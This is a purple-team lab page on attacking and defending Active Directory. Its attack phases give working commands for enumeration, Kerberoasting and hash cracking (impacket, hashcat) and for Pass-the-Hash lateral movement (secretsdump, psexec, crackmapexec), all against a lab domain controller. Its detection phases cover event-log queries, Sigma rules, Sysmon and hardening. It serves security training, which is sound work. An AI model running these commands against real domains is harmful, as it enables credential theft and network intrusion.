Lab Progress
0%0 / 13 steps
LabsIncident Response › L12
LAB L12 · ACTIVE DIRECTORY · ADVANCED

Active Directory Attack & AI Defense

Build an AD lab, enumerate with BloodHound, execute Kerberoasting and Pass-the-Hash attacks, then use AI to write detection rules from Windows Event Logs and Sigma rules for your SIEM.

120 min
🖥️ Kali + Windows Server VM
🔧 Impacket · BloodHound · Mimikatz · Sigma
🤖 AI Detection Engineering
🎯 Red/Blue Team Exercise

You're doing a purple team exercise: first play attacker and compromise the AD environment using industry-standard techniques, then switch to defender and build detection rules for everything you just did. The AI Analyst acts as your blue team partner — analyzing attack evidence and writing detection logic.

0
Phase 0 — Build the AD Lab
Set up Windows Server with Active Directory (or use an existing AD VM)
Install Windows Server and promote to Domain Controller
Free 180-day eval from Microsoft Evaluation Center
Download Windows Server 2019/2022 evaluation from microsoft.com/en-us/evalcenter. Install as a VM, then promote to DC:
# In Windows Server PowerShell (as Administrator):
Install-WindowsFeature AD-Domain-Services -IncludeManagementTools
Install-ADDSForest -DomainName "lab.local" -InstallDns -Force
# Server will reboot. After reboot, create test users:
New-ADUser -Name "alice.johnson" -AccountPassword (ConvertTo-SecureString "Password1!" -AsPlainText -Force) -Enabled $true
New-ADUser -Name "bob.smith" -AccountPassword (ConvertTo-SecureString "Summer2024!" -AsPlainText -Force) -Enabled $true
New-ADGroup -Name "IT_Admins" -GroupScope Global
Add-ADGroupMember "IT_Admins" -Members "alice.johnson"
💡
Alternatively, use the free GOAD (Game of Active Directory) lab: github.com/Orange-Cyberdefense/GOAD — a fully pre-configured vulnerable AD environment via Vagrant.
Configure Kali to reach the DC and set up Impacket
Install attack tools and verify connectivity
# On Kali — both VMs should be on Host-Only network
ping 192.168.56.10 # Windows DC IP — should respond
pip3 install impacket
sudo apt install -y bloodhound neo4j crackmapexec
# Set DNS to the DC (needed for Kerberos)
echo "nameserver 192.168.56.10" | sudo tee /etc/resolv.conf
echo "192.168.56.10 lab.local dc01.lab.local" | sudo tee -a /etc/hosts
1
Phase 1 — Enumeration (Red Team)
Map the domain: users, groups, trusts, and attack paths
LDAP enumeration with ldapsearch and enum4linux
Enumerate users, groups, and domain info without credentials
# Anonymous LDAP enumeration
ldapsearch -x -H ldap://192.168.56.10 -b "DC=lab,DC=local" "(objectClass=user)" cn sAMAccountName | tee ldap_users.txt
enum4linux -a 192.168.56.10 | tee enum4linux.txt
# CrackMapExec for quick domain info
crackmapexec smb 192.168.56.10
Run BloodHound to map attack paths
BloodHound visualizes the shortest path to Domain Admin
# Collect AD data with SharpHound (run on Windows) or bloodhound-python
bloodhound-python -u alice.johnson -p 'Password1!' -d lab.local -ns 192.168.56.10 -c All
# Start Neo4j and BloodHound GUI
sudo neo4j start
bloodhound &
# In BloodHound UI: Upload the JSON files, then run:
# Pre-Built Queries → Find Shortest Paths to Domain Admins
🤖 AI Analyst

Paste your BloodHound findings (attack paths, kerberoastable users, ACL misconfigurations). The AI will explain each vulnerability, rank by exploitability, and suggest remediation.

2
Phase 2 — Exploitation (Red Team)
Execute Kerberoasting and Pass-the-Hash attacks
Kerberoasting — steal service account hashes
Request Kerberos service tickets and crack them offline
Kerberoasting targets accounts with Service Principal Names (SPNs). The TGS ticket is encrypted with the service account's password hash — crack it offline with no lockout risk.
# Find Kerberoastable accounts
impacket-GetUserSPNs lab.local/alice.johnson:'Password1!' -dc-ip 192.168.56.10
# Request TGS tickets and output hashes
impacket-GetUserSPNs lab.local/alice.johnson:'Password1!' -dc-ip 192.168.56.10 -request -output kerberoast_hashes.txt
# Crack with hashcat (mode 13100 = Kerberos TGS)
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt
⚠️
Windows Event ID 4769 (Kerberos service ticket request) logs Kerberoasting. We'll use this in the blue team phase to detect what you just did.
Pass-the-Hash lateral movement
Use NTLM hashes to authenticate without knowing the plaintext password
# If you dumped NTLM hashes (via Mimikatz or secretsdump)
impacket-secretsdump lab.local/alice.johnson:'Password1!'@192.168.56.10
# Pass-the-Hash with a stolen NTLM hash (replace with actual hash)
impacket-psexec lab.local/Administrator@192.168.56.10 -hashes :aad3b435b51404eeaad3b435b51404ee:hash_here
# Or use CrackMapExec for network-wide PtH
crackmapexec smb 192.168.56.0/24 -u Administrator -H :hash_here
3
Phase 3 — Detection (Blue Team + AI)
Find the attacks you just ran in Windows Event Logs and write detection rules
Query Windows Event Logs for attack evidence
Find Kerberoasting, PtH, and enumeration in the Security log
On the Windows DC (PowerShell), query the Security event log:
# Detect Kerberoasting (Event 4769 with RC4 encryption)
Get-WinEvent -FilterHashtable @{LogName='Security';Id=4769} | Where-Object {$_.Properties[5].Value -eq '0x17'} | Select TimeCreated,Message | Format-List

# Detect Pass-the-Hash (Event 4624 logon type 3 with NTLM)
Get-WinEvent -FilterHashtable @{LogName='Security';Id=4624} | Where-Object {$_.Properties[8].Value -eq 3 -and $_.Properties[14].Value -eq 'NTLM'} | Select TimeCreated,Message | Format-List

# Detect credential dumping (Event 4657, 4656 on SAM hive)
Get-WinEvent -FilterHashtable @{LogName='Security';Id=4657} | Where-Object {$_.Properties[5].Value -like "*SAM*"}
🤖 AI Analyst — Blue Team Detection

Paste your Windows Event Log findings. The AI will explain what each event proves, write Sigma detection rules, and generate Splunk SPL queries to detect these attacks in production.

AI generates Sigma rules for all three attack techniques
Vendor-neutral rules deployable to any SIEM
🤖 AI Analyst — Sigma Generation

Ask the AI to write Sigma rules for: 1) Kerberoasting (Event 4769 RC4), 2) Pass-the-Hash (Event 4624 type 3 NTLM), 3) LDAP enumeration, 4) BloodHound collection. Include false positive reduction logic.

Harden the AD environment
AI recommends specific Group Policy and configuration changes
🤖 AI Analyst — AD Hardening

Describe the vulnerabilities you exploited (weak service account passwords, NTLM enabled, etc.). The AI will provide specific Group Policy settings, PowerShell commands, and architectural changes to harden the environment.

Install Sysmon for enhanced logging
Sysmon provides far more detail than standard Windows logging
# Download Sysmon from Microsoft Sysinternals
Invoke-WebRequest -Uri "https://download.sysinternals.com/files/Sysmon.zip" -OutFile Sysmon.zip
Expand-Archive Sysmon.zip
# Install with SwiftOnSecurity config (excellent community ruleset)
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/SwiftOnSecurity/sysmon-config/master/sysmonconfig-export.xml" -OutFile sysmon-config.xml
.\Sysmon64.exe -accepteula -i sysmon-config.xml
Re-run attacks and verify detection
Confirm your Sigma rules and Sysmon catch the attacks
Repeat the Kerberoasting and Pass-the-Hash attacks from Kali. Then check: do your Sigma rules fire in Splunk? Does Sysmon capture the malicious activity in Event ID 1 (process create) and Event ID 3 (network connection)?
Generate the purple team report
Document attacks, detection gaps, and recommended controls
🤖 AI Analyst

Share your attack summary and detection results. The AI will write a purple team report covering: attacks executed, detection coverage (what you detected vs missed), risk ratings, and a prioritized remediation roadmap.

Lab complete
Review key takeaways from the red/blue exercise
✅ AD environment built with users and groups
✅ BloodHound enumeration completed and attack paths mapped
✅ Kerberoasting executed and hashes cracked
✅ Pass-the-Hash lateral movement demonstrated
✅ Windows Event Logs analyzed for attack evidence
✅ Sigma rules written for all three techniques
✅ Sysmon deployed with community config
✅ Purple team report drafted

Next: Lab L13 — Memory Forensics with Volatility

Apply Volatility forensics to a realistic compromised memory image.

Start L13 →
🤖
CyberSec AI Analyst
L12 — AD Attack/Defense Mode
Lab Context: Active Directory purple team — Kerberoasting, Pass-the-Hash, BloodHound enumeration (red), Windows Event Log detection and Sigma rule writing (blue).

→ Connect AI Analyst — add your Claude API key

Actions